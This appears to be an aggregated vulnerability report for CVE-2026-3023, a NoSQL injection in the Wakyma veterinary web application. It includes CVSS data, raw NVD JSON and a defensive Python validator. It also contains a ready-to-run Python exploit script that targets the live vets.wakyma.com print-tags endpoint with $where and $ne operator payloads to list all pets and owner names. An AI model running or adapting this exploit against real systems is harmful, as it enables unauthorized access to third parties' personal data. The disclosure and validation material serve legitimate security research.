Security Vulnerability Report
CVE-2026-3023 CVSS 8.8 HIGH

CVE-2026-3023

Published: 2026-03-16 14:19:46
Last Modified: 2026-03-19 20:04:20

Description

Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/pets/print-tags'. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting NoSQL commands, allowing them to list both pets and owner names.
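The weakness behind this CVE (CWE-943, improper neutralization of special elements in a data query) arises when a JSON request field that should be a scalar is passed straight into a database filter, so a client can replace the value with an operator object. The following added example is not Wakyma code and is not derived from the advisory; the field names `pet_id` and `format`, the allowed formats, and the owner-scoping are assumptions made for illustration. It shows a server-side validator that rejects operator-bearing values before they reach the query layer, beside the unsafe pass-through pattern.

```python
#!/usr/bin/env python3
"""Server-side validation against NoSQL operator injection (CWE-943).

Added illustration, not the affected application's code. Field names and
allowed values are assumptions.
"""
import json

# Constructed sample request bodies (not captured traffic): one well-formed,
# one where the scalar field has been replaced by an operator object.
GOOD_BODY = '{"pet_id": "12345", "format": "label"}'
BAD_BODY = '{"pet_id": {"$ne": ""}, "format": "label"}'

ALLOWED_FORMATS = {"label", "tag"}  # assumed for illustration


class InvalidRequest(ValueError):
    """Raised when a request body fails validation."""


def contains_operator(value):
    """Return True if any key anywhere in a nested JSON value starts with '$'.

    Keys beginning with '$' are query operators in document databases; a
    user-supplied value must never carry them.
    """
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def unsafe_build_filter(raw_body):
    """The vulnerable pattern: whatever JSON arrives becomes the filter value,
    so an operator object such as {"$ne": ""} matches every document."""
    body = json.loads(raw_body)
    return {"_id": body["pet_id"]}


def parse_print_tags_request(raw_body):
    """Parse and validate the body; return plain strings or raise InvalidRequest."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise InvalidRequest(f"malformed JSON: {exc}") from exc
    if not isinstance(body, dict):
        raise InvalidRequest("body must be a JSON object")
    if contains_operator(body):
        raise InvalidRequest("query operators are not allowed in request fields")
    pet_id = body.get("pet_id")
    if not isinstance(pet_id, str) or not pet_id.isdigit():
        raise InvalidRequest("pet_id must be a numeric string")
    fmt = body.get("format")
    if fmt not in ALLOWED_FORMATS:
        raise InvalidRequest("unsupported format")
    return {"pet_id": pet_id, "format": fmt}


def build_filter(validated, owner_id):
    """Safe pattern: user input appears only as a validated scalar, and the
    filter is scoped to the authenticated caller's own records, so the
    endpoint cannot be used to enumerate other owners' pets."""
    return {"_id": validated["pet_id"], "owner_id": owner_id}


if __name__ == "__main__":
    print("unsafe filter from BAD_BODY:", unsafe_build_filter(BAD_BODY))
    for body in (GOOD_BODY, BAD_BODY):
        try:
            print("accepted:", build_filter(parse_print_tags_request(body), "owner-1"))
        except InvalidRequest as exc:
            print("rejected:", exc)
```

Type-checking the field (`isinstance(pet_id, str)`) is what actually closes the hole; the `$`-key scan is defence in depth for fields that legitimately accept nested objects. Scoping the filter by `owner_id` limits the blast radius even if a future field is missed.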

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wakyma:wakyma:-:*:*:*:*:*:*:* - VULNERABLE
Wakyma web application (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2026-3023 NoSQL Injection PoC
# Target: Wakyma web application - /pets/print-tags endpoint
import requests
import json

TARGET_URL = "https://vets.wakyma.com/pets/print-tags"

# Normal request payload (baseline)
normal_payload = {
    "pet_id": "12345",
    "format": "label"
}

# Malicious payload - NoSQL injection to extract all pets and owners
nosql_injection_payload = {
    "pet_id": {"$where": "function() { return true; }"},
    "format": "label"
}

# Alternative payload to extract owner names
owner_extraction_payload = {
    "pet_id": {"$ne": ""},
    "owner_name": {"$exists": True},
    "format": "label"
}


def exploit_nosql_injection():
    """
    Exploit NoSQL injection vulnerability in Wakyma application

    This PoC demonstrates how an authenticated user can inject NoSQL commands
    to extract sensitive pet and owner information from the database.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <AUTH_TOKEN>"  # Requires low-privilege auth
    }

    print("[*] Sending malicious NoSQL injection request...")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Payload: {json.dumps(nosql_injection_payload)}")

    try:
        response = requests.post(
            TARGET_URL,
            json=nosql_injection_payload,
            headers=headers,
            timeout=30,
            verify=False
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")

        if response.status_code == 200:
            data = response.json()
            print("[!] Vulnerability confirmed - NoSQL injection successful!")
            print(f"[!] Extracted data sample: {json.dumps(data, indent=2)}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

    return False


if __name__ == "__main__":
    exploit_nosql_injection()
```

References

https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web (Third Party Advisory, as listed in the NVD record below)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-3023", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:45.663", "lastModified": "2026-03-19T20:04:19.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/pets/print-tags'. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting NoSQL commands, allowing them to list both pets and owner names."}, {"lang": "es", "value": "Vulnerabilidad de inyección SQL no relacional (NoSQLi) en la aplicación web Wakyma, específicamente en el endpoint 'vets.wakyma.com/pets/print-tags'. Esta vulnerabilidad podría permitir a un usuario autenticado alterar una solicitud POST al endpoint afectado con el propósito de inyectar comandos NoSQL, permitiéndoles listar tanto mascotas como nombres de propietarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wakyma:wakyma:-:*:*:*:*:*:*:*", "matchCriteriaId": "5E72E411-C3E6-4BC9-81BD-E6F33F0C0174"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```